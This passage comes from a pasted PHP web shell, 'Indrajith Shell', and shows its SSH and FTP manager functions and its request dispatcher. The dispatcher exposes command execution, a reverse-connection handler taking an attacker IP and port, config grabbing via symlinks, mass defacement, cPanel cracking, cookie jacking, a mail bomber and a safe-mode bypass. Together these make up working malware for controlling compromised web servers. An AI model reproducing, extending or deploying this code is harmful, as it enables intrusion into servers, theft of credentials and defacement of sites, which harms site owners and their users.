  1927.         <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value='   >>   ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
  1928.     <?php
  1929.     }
  1930. }
  1931.  
  1932. function ssh_man_ui()
  1933. {
  1934.     ?>
  1935.     <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1936.     <?php
  1937. }
  1938.  
  1939. function ssh_man_bg()
  1940. {
  1941.     $ssh_h=$_GET['ssh_host'];
  1942.     $ssh_u=$_GET['ssh_user'];
  1943.     $ssh_p=$_GET['ssh_pass'];
  1944.     if(!function_exists('ssh2_connect'))
  1945.     {
  1946.         alert("Sorry, Function ssh2_connect is not found");
  1947.     }
  1948.     $conn=ssh2_connect($ssh_h, 22);
  1949.     if(!$conn)
  1950.     {
  1951.         alert("SSH Host Not Found");
  1952.     }
  1953.     $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
  1954.     if(!$log)
  1955.     {
  1956.         alert("SSH Authorication failed");
  1957.     }
  1958.     $shell=ssh2_shell($conn, "bash");
  1959.     if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
  1960.     {
  1961.         $ssh_cmd=$_GET['ssh_cmd'];
  1962.         fwrite($shell, $ssh_cmd);
  1963.         sleep(1);
  1964.         while($line=fgets($shell))
  1965.         {
  1966.             flush();
  1967.             echo $line."\n";
  1968.         }
  1969.         ?>
  1970.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1971.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1972.         <?php
  1973.     }
  1974.     else
  1975.     {
  1976.     ?>
  1977.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1978.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1979.     <?php
  1980.     }
  1981. }
  1982.  
  1983. function ftp_man_ui()
  1984. {
  1985.     ?>
  1986.     <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
  1987.     <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
  1988.     <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
  1989.     <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
  1990.     <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
  1991.     <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
  1992.     <tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1993.     <?php
  1994. }
  1995.  
  1996. function ftp_man_bg()
  1997. {
  1998.     echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
  1999.     $fhost=$_GET['ftp_host'];
  2000.     $fuser=$_GET['ftp_user'];
  2001.     $fpass=$_GET['ftp_pass'];
  2002.     $fpath=$_GET['fpath'];
  2003.     $upl=$_GET['upload_file'];
  2004.     $down=$_GET['download_file'];
  2005.     if($fpath=="")
  2006.     {
  2007.         $fpath=ftp_pwd($conn);
  2008.     }
  2009.     $conn=ftp_connect($fhost);
  2010.     if(!$conn)
  2011.     {
  2012.         alert("FTP Host Not Found!!!");
  2013.     }
  2014.     $log=ftp_login($conn, $fuser, $fpass);
  2015.     if(!$log)
  2016.     {
  2017.         alert("FTP Authorication Failed");
  2018.     }
  2019.     if($upl!="")
  2020.     {
  2021.         $fp = fopen($upl, 'r');
  2022.         if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
  2023.         {
  2024.             echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
  2025.         }
  2026.         else
  2027.         {
  2028.             echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
  2029.         }
  2030.     }
  2031.     if($down!="")
  2032.     {
  2033.         $handle = fopen($down, 'w');
  2034.         if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
  2035.         {
  2036.             echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
  2037.         }
  2038.         else
  2039.         {
  2040.             echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
  2041.         }
  2042.     }
  2043.     echo "<table class='table'><tr><th>Files</th>";
  2044.     ftp_chdir($fpath);
  2045.     $list=ftp_rawlist($conn, $fpath);
  2046.     foreach($list as $fff)
  2047.     {
  2048.         echo "<tr><td><pre>$fff</pre></td></tr>";
  2049.     }
  2050.     echo "</table></div>";
  2051. }
  2052.  
  2053. //////////////////////////////// Frond End Calls ///////////////////////////////
  2054.  
  2055. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  2056. {
  2057.     edit_file_bg();
  2058. }
  2059.  
  2060. else if(isset($_REQUEST['sh311_scanner']))
  2061. {
  2062.     shell_finder_ui();
  2063. }
  2064.  
  2065. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
  2066. {
  2067.     ftp_man_bg();
  2068. }
  2069.  
  2070. else if(isset($_REQUEST['ftpman']))
  2071. {
  2072.     ftp_man_ui();
  2073. }
  2074.  
  2075. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
  2076. {
  2077.     ssh_man_bg();
  2078. }
  2079.  
  2080. else if(isset($_REQUEST['sshman']))
  2081. {
  2082.     ssh_man_ui();
  2083. }
  2084.  
  2085. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
  2086. {
  2087.     chdir($_GET['path']);
  2088.     code_in_ui();
  2089. }
  2090.  
  2091. else if(isset($_GET['sh311_scanx']))
  2092. {
  2093.     shell_finder_bg();
  2094. }
  2095.  
  2096. else if(isset($_REQUEST['config_grab']))
  2097. {
  2098.     sym_xxx();
  2099. }
  2100.  
  2101. else if(isset($_REQUEST['ftp_man']))
  2102. {
  2103.     ftp_man_ui();
  2104. }
  2105.  
  2106. else if(isset($_REQUEST['mass_xploit']))
  2107. {
  2108.     mass_deface_ui();
  2109. }
  2110.  
  2111. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
  2112. {
  2113.     ftp_man_bg();
  2114. }
  2115.  
  2116. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  2117. {
  2118.     mass_deface_bg();
  2119. }
  2120.  
  2121. else if(isset($_REQUEST['ftp_anon_scan']))
  2122. {
  2123.     ftp_anonymous_ui();
  2124. }
  2125.  
  2126. else if(isset($_GET['ftp_anonz']))
  2127. {
  2128.     ftp_anonymous_bg();
  2129. }
  2130.  
  2131. else if(isset($_REQUEST['killme']))
  2132. {
  2133.     killme();
  2134. }
  2135.  
  2136. else if(isset($_REQUEST['hexenc']))
  2137. {
  2138.     hex_encode_ui();
  2139. }
  2140.  
  2141. else if(isset($_REQUEST['remotefiledown']))
  2142. {
  2143.     remote_download_ui();
  2144. }
  2145.  
  2146. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  2147. {
  2148.     remote_download_bg();
  2149. }
  2150.  
  2151. else if(isset($_REQUEST['cpanel_crack']))
  2152. {
  2153.     cpanel_crack();
  2154. }
  2155.  
  2156. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  2157. {
  2158.     remote_file_check_bg();
  2159. }
  2160.  
  2161. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  2162. {
  2163.     php_ende_bg();
  2164. }
  2165.  
  2166. else if(isset($_REQUEST['remote_server_scan']))
  2167. {
  2168.     remote_file_check_ui();
  2169. }
  2170.  
  2171. else if(isset($_REQUEST['server_exploit_details']))
  2172. {
  2173.     exploit_details();
  2174. }
  2175.  
  2176. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  2177. {
  2178.     massmailer_bg();
  2179. }
  2180.  
  2181. else if(isset($_REQUEST['mysqlman']))
  2182. {
  2183.     mysqlman();
  2184. }
  2185.  
  2186. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  2187. {
  2188.     mailbomb_bg();
  2189. }
  2190.  
  2191. else if(isset($_REQUEST['cookiejack']))
  2192. {
  2193.     cookie_jack();
  2194. }
  2195.  
  2196. else if(isset($_REQUEST['massmailer']))
  2197. {
  2198.     massmailer_ui();
  2199. }
  2200.  
  2201. else if(isset($_REQUEST['rename']))
  2202. {
  2203.     chdir($_GET['path']);
  2204.     rename_ui();
  2205. }
  2206.  
  2207. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  2208. {
  2209.     chdir($_GET['path']);
  2210.     rename_bg();
  2211. }
  2212.  
  2213. else if(isset($_REQUEST['encodefile']))
  2214. {
  2215.     php_ende_ui();
  2216. }
  2217.  
  2218. else if(isset($_REQUEST['edit']))
  2219. {
  2220.     edit_file();
  2221. }
  2222.  
  2223. else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
  2224. {
  2225.     download();
  2226. }
  2227.  
  2228. else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
  2229. {
  2230.     download_gzip();
  2231. }
  2232.  
  2233. else if(isset($_REQUEST['read']))
  2234. {
  2235.     chdir($_GET['path']);
  2236.     code_viewer();
  2237. }
  2238.  
  2239. else if(isset($_REQUEST['perm']))
  2240. {
  2241.     chdir($_GET['path']);
  2242.     ch_perm_ui();
  2243. }
  2244.  
  2245. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  2246. {
  2247.     chdir($_GET['path']);
  2248.     ch_perm_bg();
  2249. }
  2250.  
  2251. else if(isset($_REQUEST['del_fil']))
  2252. {
  2253.     chdir($_GET['path']);
  2254.     delete_file();
  2255.     exit;
  2256. }
  2257. else if(isset($_REQUEST['phpinfo']))
  2258. {
  2259.     chdir($_GET['path']);
  2260.     ob_clean();
  2261.     echo phpinfo();
  2262.     exit;
  2263. }
  2264. else if(isset($_REQUEST['del_dir']))
  2265. {
  2266.     chdir($_GET['path']);
  2267.     $d_dir=$_GET['del_dir'];
  2268.     deldirs($d_dir);
  2269. }
  2270. else if(isset($_GET['path']) && isset($_GET['new_file']))
  2271. {
  2272.     chdir($_GET['path']);
  2273.     mk_file_ui();
  2274. }
  2275. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  2276. {
  2277.     mk_file_bg();
  2278. }
  2279. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  2280. {
  2281.     chdir($_GET['path']);
  2282.     create_dir();
  2283. }
  2284. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  2285. {
  2286.     chdir($_GET['path']);
  2287.     cmd();
  2288. }
  2289. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  2290. {
  2291.     upload_file();
  2292. }
  2293. else if(isset($_REQUEST['rs']))
  2294. {
  2295.     reverse_conn_ui();
  2296. }
  2297. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  2298. {
  2299.     reverse_conn_bg();
  2300. }
  2301. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  2302. {
  2303.     chdir($_GET['path']);
  2304.     safe_mode_fuck_ui();
  2305. }
  2306. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  2307. {
  2308.     safe_mode_fuck();
  2309. }
  2310. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  2311. {
  2312.     AccessDenied();
  2313. }
  2314.  
  2315. else if(isset($_REQUEST['symlink']))
  2316. {
  2317.     sym_link();
  2318. }
  2319.  
  2320. else if(isset($_GET['path']) && isset($_GET['copy']))
  2321. {
  2322.     copy_file_ui();
  2323. }
  2324. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  2325. {
  2326.     copy_file_bg();
  2327. }
  2328. else
  2329. {
  2330.     filemanager_bg();
  2331. }
  2332.  
  2333. ////////////////////////////// End Frond End Calls //////////////////////////////
  2334.  
  2335. echo "</div><div id=result><center><p><table class='tbl'>
  2336.      <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value='   >>   ' /></form></td></tr></table>
  2337.      <table class='tbl'><tr>
  2338.          <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value='   >>   ' ><input size='40' name='new_file' /></form>
  2339.          </td>
  2340.          <td><form  style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value='   >>   ' /><span> : New Dir</span></form>
  2341.          </td>
  2342.      </tr>
  2343.      <tr>
  2344.          <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value='   >>   ' ><input name='cmdexe' size='40' /></form>
  2345.          </td>
  2346.          <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value='   >>   ' /><span> : Upload File</span></form>
  2347.          </td>
  2348.        </tr>
  2349.      </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=https://local-hunter.com/>AJITH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  2350. ?>
Add Comment
Please, Sign In to add comment